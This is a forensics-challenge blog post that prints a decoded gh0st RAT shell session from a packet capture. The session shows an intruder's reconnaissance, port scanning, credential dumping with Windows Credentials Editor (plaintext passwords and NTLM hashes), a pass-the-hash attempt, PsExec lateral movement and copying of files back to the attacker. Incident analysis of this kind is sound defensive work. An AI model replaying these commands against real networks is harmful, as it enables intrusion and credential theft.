Wednesday, November 28, 2012
@jackcr forensic challenge #2 - pcap decoded
Written by:
ulilclown@gmail.com/@alwaysreit
infoseckitten@gmail.com/@infoseckitten
hack3rsaurus@gmail.com/@magicked
To decode the pcap included in the challenge, we leveraged the open-source tool ChopShop from MITRE, which includes a handy module called "gh0st_decode".
Below is the decoded pcap from @jackcr's challenge. The gh0st RAT command used by the attacker was SHELL, which (duh) gives shell access. This output is everything that occurred during that shell session. McAfee has a great writeup on gh0st if you want to learn more.
In the data below, the lines shown in RED are data echoed back to the attacker's console and the lines shown in GREEN are the commands entered by the attacker. We were going to add notes about what each command does, but reading through them should be pretty self-explanatory. Cheers!
TOKEN: LOGIN: eng-ustxhou-148: Windows XP Service Pack 3 - Build: 2600 - Clock: 3056 Mhz - IP: 172.16.150.20 Webcam: no
COMMAND: ACTIVED
COMMAND: SHELL
TOKEN: SHELL START
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
cd ..
cd ..
C:\WINDOWS>
mkdir webui
mkdir webui
C:\WINDOWS>
cd webui
cd webui
C:\WINDOWS\webui>
ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 172.16.150.20
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.150.2
C:\WINDOWS\webui>
COMMAND: LIST DRIVE
TOKEN: DRIVE LIST
DRIVE TOTAL FREE FILESYSTEM DESCRIPTION
A 0 0 Removable Disk
C 10228 6681 NTFS Local Disk
D 539 0 CDFS CD Drive
COMMAND: LIST FILES (C:\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR AUTOEXEC.BAT 0 129964314217180000
DIR boot.ini 211 129981609811585442
DIR CONFIG.SYS 0 129964314217180000
DIR Documents and Settings 0 129964569290921031
DIR IO.SYS 0 129964314217180000
DIR MSDOS.SYS 0 129964314217180000
DIR NTDETECT.COM 47564 129981606020615962
DIR ntldr 250048 129981618306345996
DIR pagefile.sys 805306368 129984410083593750
DIR Program Files 0 129964566580312500
DIR RECYCLER 0 129982548503655357
DIR System Volume Information 0 129981611111718750
DIR WINDOWS 0 129984445902376741
COMMAND: LIST FILES (C:\WINDOWS\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR $NtServicePackUninstall$ 0 129981617362706222
DIR 0.log 0 129984410391770812
DIR 002237_.tmp 19528 127345596220000000
DIR 005354_.tmp 19569 128118474920000000
DIR addins 0 129964088069843750
DIR AppPatch 0 129981626005000000
DIR Blue Lace 16.bmp 1272 126750960000000000
...snip...
DIR vmmreg32.dll 18944 126750960000000000
DIR WBEM 0 129981628323899504
DIR Web 0 129981606114042698
DIR webui 0 129984445902376741
DIR wiadebug.log 501 129964090375625000
DIR wiaservc.log 49 129964090399218750
DIR win.ini 487 129981609789869194
DIR Windows Update.log 280 129964313932961250
DIR WindowsShell.Manifest 749 129964313556867500
DIR WindowsUpdate.log 16837 129984414211761086
DIR winhelp.exe 256192 126750960000000000
DIR winhlp32.exe 283648 128526469600000000
DIR winnt.bmp 48680 126750960000000000
DIR winnt256.bmp 48680 126750960000000000
DIR WinSxS 0 129981622067605818
DIR wmsetup.log 1900 129981626884583944
DIR WMSysPr9.prx 316640 129981626850685706
DIR WMSysPrx.prx 299552 129964314180773750
DIR Zapotec.bmp 9522 126750960000000000
DIR _default.pif 707 126750960000000000
COMMAND: FILE SIZE (C:\WINDOWS\ps.exe: 381816)
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (8183)
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (8183)
...snip...
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (5398)
TOKEN: DATA CONTINUE
COMMAND: LIST FILES (C:\WINDOWS\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR $NtServicePackUninstall$ 0 129981617362706222
DIR 0.log 0 129984410391770812
DIR 002237_.tmp 19528 127345596220000000
DIR 005354_.tmp 19569 128118474920000000
DIR addins 0 129964088069843750
DIR AppPatch 0 129981626005000000
DIR Blue Lace 16.bmp 1272 126750960000000000
DIR bootstat.dat 2048 129984410109687500
...snip...
DIR WBEM 0 129981628323899504
DIR Web 0 129981606114042698
DIR webui 0 129984445902376741
DIR wiadebug.log 501 129964090375625000
DIR wiaservc.log 49 129964090399218750
DIR win.ini 487 129981609789869194
DIR Windows Update.log 280 129964313932961250
DIR WindowsShell.Manifest 749 129964313556867500
DIR WindowsUpdate.log 16837 129984414211761086
DIR winhelp.exe 256192 126750960000000000
DIR winhlp32.exe 283648 128526469600000000
DIR winnt.bmp 48680 126750960000000000
DIR winnt256.bmp 48680 126750960000000000
DIR WinSxS 0 129981622067605818
DIR wmsetup.log 1900 129981626884583944
DIR WMSysPr9.prx 316640 129981626850685706
DIR WMSysPrx.prx 299552 129964314180773750
DIR Zapotec.bmp 9522 126750960000000000
DIR _default.pif 707 126750960000000000
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST (INVALID HANDLE)
COMMAND: FILE SIZE (C:\WINDOWS\webui\gs.exe: 303104)
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (8183)
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (8183)
...snip...
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (333)
TOKEN: DATA CONTINUE
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
COMMAND: FILE SIZE (C:\WINDOWS\webui\ra.exe: 403968)
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (8183)
...snip...
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (8183)
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (3001)
TOKEN: DATA CONTINUE
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
DIR ra.exe 403968 129984448127283287
COMMAND: FILE SIZE (C:\WINDOWS\webui\sl.exe: 20480)
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (8183)
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (8183)
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (4114)
TOKEN: DATA CONTINUE
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
DIR ra.exe 403968 129984448127283287
DIR sl.exe 20480 129984448163068888
COMMAND: FILE SIZE (C:\WINDOWS\webui\wc.exe: 208384)
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (8183)
TOKEN: DATA CONTINUE
...snip...
TOKEN: DATA CONTINUE
COMMAND: FILE DATA (3809)
TOKEN: DATA CONTINUE
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
DIR ra.exe 403968 129984448127283287
DIR sl.exe 20480 129984448163068888
DIR wc.exe 208384 129984448197760606
ipconfig /all >> netuse.dll
ipconfig /all >> netuse.dll
C:\WINDOWS\webui>
net view >> netuse.dll
net view >> netuse.dll
C:\WINDOWS\webui>
net localgroup administrators >> netuse.dll
net localgroup administrators >> netuse.dll
C:\WINDOWS\webui>
net sessions >> netuse.dll
net sessions >> netuse.dll
C:\WINDOWS\webui>
net share >> netuse.dll
net share >> netuse.dll
C:\WINDOWS\webui>
net start >> netuse.dll
net start >> netuse.dll
C:\WINDOWS\webui>
sl.exe -bht 445,80.443.21.1433 172.16.150.1-254 >> netuse.dll
sl.exe -bht 445,80.443.21.1433 172.16.150.1-254 >> netuse.dll
ScanLine (TM) 1.01
Copyright (c) Foundstone, Inc. 2002
http://www.foundstone.com
5 IPs and 25 ports scanned in 0 hours 0 mins 13.11 secs
C:\WINDOWS\webui>
sl.exe -bht 445,80,443,21,1433 172.16.150.1-254 >> netuse.dll
sl.exe -bht 445,80,443,21,1433 172.16.150.1-254 >> netuse.dll
ScanLine (TM) 1.01
Copyright (c) Foundstone, Inc. 2002
http://www.foundstone.com
5 IPs and 25 ports scanned in 0 hours 0 mins 13.08 secs
C:\WINDOWS\webui>
gs -a >> netuse.dll
gs -a >> netuse.dll
0043B820
C:\WINDOWS\webui>
COMMAND: LIST DRIVE
TOKEN: DRIVE LIST
DRIVE TOTAL FREE FILESYSTEM DESCRIPTION
A 0 0 Removable Disk
C 10228 6680 NTFS Local Disk
D 539 0 CDFS CD Drive
COMMAND: LIST FILES (C:\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR AUTOEXEC.BAT 0 129964314217180000
DIR boot.ini 211 129981609811585442
DIR CONFIG.SYS 0 129964314217180000
DIR Documents and Settings 0 129964569290921031
DIR IO.SYS 0 129964314217180000
DIR MSDOS.SYS 0 129964314217180000
DIR NTDETECT.COM 47564 129981606020615962
DIR ntldr 250048 129981618306345996
DIR pagefile.sys 805306368 129984410083593750
DIR Program Files 0 129964566580312500
DIR RECYCLER 0 129982548503655357
DIR System Volume Information 0 129981611111718750
DIR WINDOWS 0 129984447946948861
COMMAND: LIST FILES (C:\WINDOWS\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR $NtServicePackUninstall$ 0 129981617362706222
DIR 0.log 0 129984410391770812
DIR 002237_.tmp 19528 127345596220000000
...snip...
DIR winhlp32.exe 283648 128526469600000000
DIR winnt.bmp 48680 126750960000000000
DIR winnt256.bmp 48680 126750960000000000
DIR WinSxS 0 129981622067605818
DIR wmsetup.log 1900 129981626884583944
DIR WMSysPr9.prx 316640 129981626850685706
DIR WMSysPrx.prx 299552 129964314180773750
DIR Zapotec.bmp 9522 126750960000000000
DIR _default.pif 707 126750960000000000
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
DIR netuse.dll 11844 129984451183437846
DIR ra.exe 403968 129984448127283287
DIR sl.exe 20480 129984448163068888
DIR wc.exe 208384 129984448197760606
COMMAND: DOWN FILES (C:\WINDOWS\webui\netuse.dll)
TOKEN: FILE SIZE (C:\WINDOWS\webui\netuse.dll: 11844)
COMMAND: CONTINUE
TOKEN: FILE DATA (8183)
COMMAND: CONTINUE
TOKEN: FILE DATA (3661)
COMMAND: CONTINUE
TOKEN: TRANSFER FINISH
ping DC-USTXHOU
ping DC-USTXHOU
Pinging dc-ustxhou.petro-market.org [172.16.150.10] with 32 bytes of data:
Reply from 172.16.150.10: bytes=32 time<1ms TTL=128
Reply from 172.16.150.10: bytes=32 time<1ms TTL=128
Reply from 172.16.150.10: bytes=32 time<1ms TTL=128
Reply from 172.16.150.10: bytes=32 time<1ms TTL=128
Ping statistics for 172.16.150.10:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
C:\WINDOWS\webui>
ping IIS-SARIYADH-03
ping IIS-SARIYADH-03
Pinging IIS-SARIYADH-03.petro-market.org [172.16.223.47] with 32 bytes of data:
Reply from 172.16.223.47: bytes=32 time=2ms TTL=127
Reply from 172.16.223.47: bytes=32 time=1ms TTL=127
Reply from 172.16.223.47: bytes=32 time=1ms TTL=127
Reply from 172.16.223.47: bytes=32 time<1ms TTL=127
Ping statistics for 172.16.223.47:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 2ms, Average = 1ms
C:\WINDOWS\webui>
dir
dir
Volume in drive C has no label.
Volume Serial Number is 1044-534A
Directory of C:\WINDOWS\webui
11/26/2012 05:07 PM <DIR> .
11/26/2012 05:07 PM <DIR> ..
11/26/2012 05:06 PM 303,104 gs.exe
11/26/2012 05:11 PM 11,844 netuse.dll
11/26/2012 05:06 PM 403,968 ra.exe
11/26/2012 05:06 PM 20,480 sl.exe
11/26/2012 05:06 PM 208,384 wc.exe
5 File(s) 947,780 bytes
2 Dir(s) 7,005,007,872 bytes free
C:\WINDOWS\webui>
wc.exe -l
wc.exe -l
WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
callb:PETRO-MARKET:115B24322C11908C85140F5D33B6232F:40D1D232D5F731EA966913EA458A16E7
ENG-USTXHOU-148$:PETRO-MARKET:00000000000000000000000000000000:D6717F1E5252FA87ED40AF8C46D8B1E2
C:\WINDOWS\webui>
wc.exe -w
wc.exe -w
WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
callb\PETRO-MARKET:Mar1ners@4655
NETWORK SERVICE\PETRO-MARKET:+A;dhzj%o<8xpD@,p5v)C:p2%?1Nkx&5OU!c[wt5BgV'r4p7/lWc[`XWPpN/.d$I.Ubc-7c $-ap(@?I7S6SD(U-zbdQHgT2& u\rgk(ga?y+GGE*E_0/2Qs
ENG-USTXHOU-148$\PETRO-MARKET:+A;dhzj%o<8xpD@,p5v)C:p2%?1Nkx&5OU!c[wt5BgV'r4p7/lWc[`XWPpN/.d$I.Ubc-7c $-ap(@?I7S6SD(U-zbdQHgT2& u\rgk(ga?y+GGE*E_0/2Qs
C:\WINDOWS\webui>
ps.exe \\172.16.150.10 -u petro1-market\callb -p Mar1ners@4655 -accepteula cmd /c ipconfig
ps.exe \\172.16.150.10 -u petro1-market\callb -p Mar1ners@4655 -accepteula cmd /c ipconfig
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
The handle is invalid.
Connecting to 172.16.150.10... Couldn't access 172.16.150.10:
Connecting to 172.16.150.10...
C:\WINDOWS\webui>
ps \\172.16.223.47 -u petro1-market\callb -p Mar1ners@4655 -accepteula cmd /c ipconfig
ps \\172.16.223.47 -u petro1-market\callb -p Mar1ners@4655 -accepteula cmd /c ipconfig
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
The handle is invalid.
Connecting to 172.16.223.47... Couldn't access 172.16.223.47:
Connecting to 172.16.223.47...
C:\WINDOWS\webui>
wc.exe -s sysbackup:current:c2a3915df2ec79ee73108eb48073acb7:e7a6f270f1ba562a90e2c133a95d2057
wc.exe -s sysbackup:current:c2a3915df2ec79ee73108eb48073acb7:e7a6f270f1ba562a90e2c133a95d2057
WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Changing NTLM credentials of current logon session (000003E7h) to:
Username: sysbackup
domain: current
LMHash: c2a3915df2ec79ee73108eb48073acb7
NTHash: e7a6f270f1ba562a90e2c133a95d2057
NTLM credentials successfully changed!
C:\WINDOWS\webui>
ps.exe \\172.16.150.10 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig
ps.exe \\172.16.150.10 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
The handle is invalid.
Connecting to 172.16.150.10... Couldn't access 172.16.150.10:
Connecting to 172.16.150.10...
C:\WINDOWS\webui>
ps.exe \\172.16.223.47 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig
ps.exe \\172.16.223.47 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
The file exists.
Connecting to 172.16.223.47... Starting PsExec service on 172.16.223.47... Connecting with PsExec service on 172.16.223.47... Copying C:\WINDOWS\system32\ipconfig.exe to 172.16.223.47... Error copying C:\WINDOWS\system32\ipconfig.exe to remote system:
C:\WINDOWS\webui>
cd ..
cd ..
C:\WINDOWS>
ps.exe \\172.16.223.47 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig
ps.exe \\172.16.223.47 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
The file exists.
Connecting to 172.16.223.47... Starting PsExec service on 172.16.223.47... Connecting with PsExec service on 172.16.223.47... Copying C:\WINDOWS\system32\ipconfig.exe to 172.16.223.47... Error copying C:\WINDOWS\system32\ipconfig.exe to remote system:
C:\WINDOWS>
ps.exe \\172.16.223.47 -u sysbackup -p T1g3rs&L10n5 -accpeteula cmd /c ipconfig
ps.exe \\172.16.223.47 -u sysbackup -p T1g3rs&L10n5 -accpeteula cmd /c ipconfig
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
PsExec executes a program on a remote system, where remotely executed console
applications execute interactively.
Usage: psexec [\\computer[,computer2[,...] | @file]][-u user [-p psswd][-n s][-l][-s|-e][-x][-i [session]][-c [-f|-v]][-w directory][-d][-<priority>][-a n,n,...] cmd [arguments]
-a Separate processors on which the application can run with
commas where 1 is the lowest numbered CPU. For example,
to run the application on CPU 2 and CPU 4, enter:
"-a 2,4"
-c Copy the specified program to the remote system for
execution. If you omit this option the application
must be in the system path on the remote system.
-d Don't wait for process to terminate (non-interactive).
-e Does not load the specified account's profile.
-f Copy the specified program even if the file already
exists on the remote system.
-i Run the program so that it interacts with the desktop of the
specified session on the remote system. If no session is
specified the process runs in the console session.
-h If the target system is Vista or higher, has the process
run with the account's elevated token, if available.
-l Run process as limited user (strips the Administrators group
and allows only privileges assigned to the Users group).
On Windows Vista the process runs with Low Integrity.
-n Specifies timeout in seconds connecting to remote computers.
-p Specifies optional password for user name. If you omit this
you will be prompted to enter a hidden password.
-s Run the remote process in the System account.
-u Specifies optional user name for login to remote
computer.
-v Copy the specified file only if it has a higher version number
or is newer on than the one on the remote system.
-w Set the working directory of the process (relative to
remote computer).
-x Display the UI on the Winlogon secure desktop (local system
only).
-priority Specifies -low, -belownormal, -abovenormal, -high or
-realtime to run the process at a different priority. Use
-background to run at low memory and I/O priority on Vista.
computer Direct PsExec to run the application on the remote
computer or computers specified. If you omit the computer
name PsExec runs the application on the local system,
and if you specify a wildcard (\\*), PsExec runs the
command on all computers in the current domain.
@file PsExec will execute the command on each of the computers listed
in the file.
program Name of application to execute.
arguments Arguments to pass (note that file paths must be
absolute paths on the target system).
You can enclose applications that have spaces in their name with
quotation marks e.g. psexec \\marklap "c:\long name app.exe".
Input is only passed to the remote system when you press the enter
key, and typing Ctrl-C terminates the remote process.
If you omit a user name the process will run in the context of your
account on the remote system, but will not have access to network
resources (because it is impersonating). Specify a valid user name
in the Domain\User syntax if the remote process requires access
to network resources or to run in a different account. Note that
the password is transmitted in clear text to the remote system.
Error codes returned by PsExec are specific to the applications you
execute, not PsExec.
'L10n5' is not recognized as an internal or external command,
operable program or batch file.
C:\WINDOWS>
wce -w
wce -w
'wce' is not recognized as an internal or external command,
operable program or batch file.
C:\WINDOWS>
cd webui
cd webui
C:\WINDOWS\webui>
wc -w
wc -w
WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
callb\PETRO-MARKET:Mar1ners@4655
NETWORK SERVICE\PETRO-MARKET:+A;dhzj%o<8xpD@,p5v)C:p2%?1Nkx&5OU!c[wt5BgV'r4p7/lWc[`XWPpN/.d$I.Ubc-7c $-ap(@?I7S6SD(U-zbdQHgT2& u\rgk(ga?y+GGE*E_0/2Qs
ENG-USTXHOU-148$\PETRO-MARKET:+A;dhzj%o<8xpD@,p5v)C:p2%?1Nkx&5OU!c[wt5BgV'r4p7/lWc[`XWPpN/.d$I.Ubc-7c $-ap(@?I7S6SD(U-zbdQHgT2& u\rgk(ga?y+GGE*E_0/2Qs
C:\WINDOWS\webui>
ps.exe \\172.16.223.47 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig
ps.exe \\172.16.223.47 -u sysbackup -p T1g3rsL10n5 -accpeteula cmd /c ipconfig
PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
The file exists.
Connecting to 172.16.223.47... Starting PsExec service on 172.16.223.47... Connecting with PsExec service on 172.16.223.47... Copying C:\WINDOWS\system32\ipconfig.exe to 172.16.223.47... Error copying C:\WINDOWS\system32\ipconfig.exe to remote system:
C:\WINDOWS\webui>
net use z: \\172.16.223.47\z
net use z: \\172.16.223.47\z
The command completed successfully.
C:\WINDOWS\webui>
copy z:\system.dll .
copy z:\system.dll .
1 file(s) copied.
C:\WINDOWS\webui>
dir
dir
Volume in drive C has no label.
Volume Serial Number is 1044-534A
Directory of C:\WINDOWS\webui
11/26/2012 06:49 PM <DIR> .
11/26/2012 06:49 PM <DIR> ..
11/26/2012 05:06 PM 303,104 gs.exe
11/26/2012 05:11 PM 11,844 netuse.dll
11/26/2012 05:06 PM 403,968 ra.exe
11/26/2012 05:06 PM 20,480 sl.exe
11/26/2012 06:44 PM 5,711 system.dll
11/26/2012 05:06 PM 208,384 wc.exe
6 File(s) 953,491 bytes
2 Dir(s) 7,004,934,144 bytes free
C:\WINDOWS\webui>
COMMAND: LIST DRIVE
TOKEN: DRIVE LIST
DRIVE TOTAL FREE FILESYSTEM DESCRIPTION
A 0 0 Removable Disk
C 10228 6680 NTFS Local Disk
D 539 0 CDFS CD Drive
Z 15351 13079 NTFS Network Drive
COMMAND: LIST FILES (C:\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR AUTOEXEC.BAT 0 129964314217180000
DIR boot.ini 211 129981609811585442
DIR CONFIG.SYS 0 129964314217180000
DIR Documents and Settings 0 129964569290921031
DIR IO.SYS 0 129964314217180000
DIR MSDOS.SYS 0 129964314217180000
DIR NTDETECT.COM 47564 129981606020615962
DIR ntldr 250048 129981618306345996
DIR pagefile.sys 805306368 129984410083593750
DIR Program Files 0 129964566580312500
DIR RECYCLER 0 129982548503655357
DIR System Volume Information 0 129981611111718750
DIR WINDOWS 0 129984447946948861
COMMAND: LIST FILES (C:\WINDOWS\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR $NtServicePackUninstall$ 0 129981617362706222
DIR 0.log 0 129984410391770812
DIR 002237_.tmp 19528 127345596220000000
...snip...
DIR winhlp32.exe 283648 128526469600000000
DIR winnt.bmp 48680 126750960000000000
DIR winnt256.bmp 48680 126750960000000000
DIR WinSxS 0 129981622067605818
DIR wmsetup.log 1900 129981626884583944
DIR WMSysPr9.prx 316640 129981626850685706
DIR WMSysPrx.prx 299552 129964314180773750
DIR Zapotec.bmp 9522 126750960000000000
DIR _default.pif 707 126750960000000000
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
DIR netuse.dll 11844 129984451183437846
DIR ra.exe 403968 129984448127283287
DIR sl.exe 20480 129984448163068888
DIR system.dll 5711 129984506561910154
DIR wc.exe 208384 129984448197760606
COMMAND: DOWN FILES (C:\WINDOWS\webui\system.dll)
TOKEN: FILE SIZE (C:\WINDOWS\webui\system.dll: 5711)
COMMAND: CONTINUE
TOKEN: FILE DATA (5711)
COMMAND: CONTINUE
TOKEN: TRANSFER FINISH
copy z:\svchost.dll .
copy z:\svchost.dll .
1 file(s) copied.
C:\WINDOWS\webui>
COMMAND: LIST FILES (C:\WINDOWS\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR $NtServicePackUninstall$ 0 129981617362706222
DIR 0.log 0 129984410391770812
DIR 002237_.tmp 19528 127345596220000000
DIR 005354_.tmp 19569 128118474920000000
DIR addins 0 129964088069843750
DIR AppPatch 0 129981626005000000
DIR Blue Lace 16.bmp 1272 126750960000000000
DIR bootstat.dat 2048 129984410109687500
DIR clock.avi 82944 126750960000000000
DIR cmsetacl.log 373 129981622463220165
DIR Coffee Bean.bmp 17062 126750960000000000
...snip...
DIR Web 0 129981606114042698
DIR webui 0 129984509415736823
DIR wiadebug.log 501 129964090375625000
DIR wiaservc.log 49 129964090399218750
DIR win.ini 487 129981609789869194
DIR Windows Update.log 280 129964313932961250
DIR WindowsShell.Manifest 749 129964313556867500
DIR WindowsUpdate.log 16837 129984414211761086
DIR winhelp.exe 256192 126750960000000000
DIR winhlp32.exe 283648 128526469600000000
DIR winnt.bmp 48680 126750960000000000
DIR winnt256.bmp 48680 126750960000000000
DIR WinSxS 0 129981622067605818
DIR wmsetup.log 1900 129981626884583944
DIR WMSysPr9.prx 316640 129981626850685706
DIR WMSysPrx.prx 299552 129964314180773750
DIR Zapotec.bmp 9522 126750960000000000
DIR _default.pif 707 126750960000000000
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
DIR netuse.dll 11844 129984451183437846
DIR ra.exe 403968 129984448127283287
DIR sl.exe 20480 129984448163068888
DIR svchost.dll 1230 129984514039992804
DIR system.dll 5711 129984506561910154
DIR wc.exe 208384 129984448197760606
COMMAND: DOWN FILES (C:\WINDOWS\webui\svchost.dll)
TOKEN: FILE SIZE (C:\WINDOWS\webui\svchost.dll: 1230)
COMMAND: CONTINUE
TOKEN: FILE DATA (1230)
COMMAND: CONTINUE
TOKEN: TRANSFER FINISH
copy z:\https.dll .
copy z:\https.dll .
1 file(s) copied.
C:\WINDOWS\webui>
COMMAND: LIST FILES (C:\WINDOWS\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR $NtServicePackUninstall$ 0 129981617362706222
DIR 0.log 0 129984410391770812
DIR 002237_.tmp 19528 127345596220000000
DIR 005354_.tmp 19569 128118474920000000
DIR addins 0 129964088069843750
DIR AppPatch 0 129981626005000000
...snip...
DIR webui 0 129984514405856769
DIR wiadebug.log 501 129964090375625000
DIR wiaservc.log 49 129964090399218750
DIR win.ini 487 129981609789869194
DIR Windows Update.log 280 129964313932961250
DIR WindowsShell.Manifest 749 129964313556867500
DIR WindowsUpdate.log 16837 129984414211761086
DIR winhelp.exe 256192 126750960000000000
DIR winhlp32.exe 283648 128526469600000000
DIR winnt.bmp 48680 126750960000000000
DIR winnt256.bmp 48680 126750960000000000
DIR WinSxS 0 129981622067605818
DIR wmsetup.log 1900 129981626884583944
DIR WMSysPr9.prx 316640 129981626850685706
DIR WMSysPrx.prx 299552 129964314180773750
DIR Zapotec.bmp 9522 126750960000000000
DIR _default.pif 707 126750960000000000
COMMAND: LIST FILES (C:\WINDOWS\webui\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR gs.exe 303104 129984448080090049
DIR https.dll 5282 129984516342112452
DIR netuse.dll 11844 129984451183437846
DIR ra.exe 403968 129984448127283287
DIR sl.exe 20480 129984448163068888
DIR svchost.dll 1230 129984514039992804
DIR system.dll 5711 129984506561910154
DIR wc.exe 208384 129984448197760606
COMMAND: DOWN FILES (C:\WINDOWS\webui\https.dll)
TOKEN: FILE SIZE (C:\WINDOWS\webui\https.dll: 5282)
COMMAND: CONTINUE
TOKEN: FILE DATA (5282)
COMMAND: CONTINUE
TOKEN: TRANSFER FINISH
z:
z:
Z:\>
dir
dir
Volume in drive Z has no label.
Volume Serial Number is 9CC4-949D
Directory of Z:\
11/26/2012 07:11 PM <DIR> .
11/26/2012 07:11 PM <DIR> ..
11/26/2012 06:20 PM 303,104 gs.exe
11/26/2012 07:00 PM 5,282 https.dll
11/26/2012 07:11 PM 109,092 netstat.dll
11/26/2012 06:20 PM 403,968 ra.exe
11/26/2012 06:56 PM 1,230 svchost.dll
11/26/2012 06:44 PM 5,711 system.dll
6 File(s) 828,387 bytes
2 Dir(s) 13,714,014,208 bytes free
Z:\>
c:
c:
C:\WINDOWS\webui>
dir
dir
Volume in drive C has no label.
Volume Serial Number is 1044-534A
Directory of C:\WINDOWS\webui
11/26/2012 07:01 PM <DIR> .
11/26/2012 07:01 PM <DIR> ..
11/26/2012 05:06 PM 303,104 gs.exe
11/26/2012 07:00 PM 5,282 https.dll
11/26/2012 05:11 PM 11,844 netuse.dll
11/26/2012 05:06 PM 403,968 ra.exe
11/26/2012 05:06 PM 20,480 sl.exe
11/26/2012 06:56 PM 1,230 svchost.dll
11/26/2012 06:44 PM 5,711 system.dll
11/26/2012 05:06 PM 208,384 wc.exe
8 File(s) 960,003 bytes
2 Dir(s) 7,004,917,760 bytes free
C:\WINDOWS\webui>
copy z:\netstat.dll .
copy z:\netstat.dll .
1 file(s) copied.
C:\WINDOWS\webui>
COMMAND: LIST FILES (C:\WINDOWS\)
TOKEN: FILE LIST
TYPE NAME SIZE WRITE TIME
DIR $NtServicePackUninstall$ 0 129981617362706222
DIR 0.log 0 129984410391770812
DIR 002237_.tmp 19528 127345596220000000
DIR 005354_.tmp 19569 128118474920000000
DIR addins 0 129964088069843750
DIR AppPatch 0 129981626005000000
DIR Blue Lace 16.bmp 1272 126750960000000000
...snip...
DIR Web 0 129981606114042698
DIR webui 0 129984516993374682
DIR wiadebug.log 501 129964090375625000
DIR wiaservc.log 49 129964090399218750
DIR win.ini 487 129981609789869194
DIR Windows Update.log 280 129964313932961250
DIR WindowsShell.Manifest 749 129964313556867500
DIR WindowsUpdate.log 16837 129984414211761086
DIR winhelp.exe 256192 126750960000000000
DIR winhlp32.exe 283648 128526469600000000
DIR winnt.bmp 48680 126750960000000000
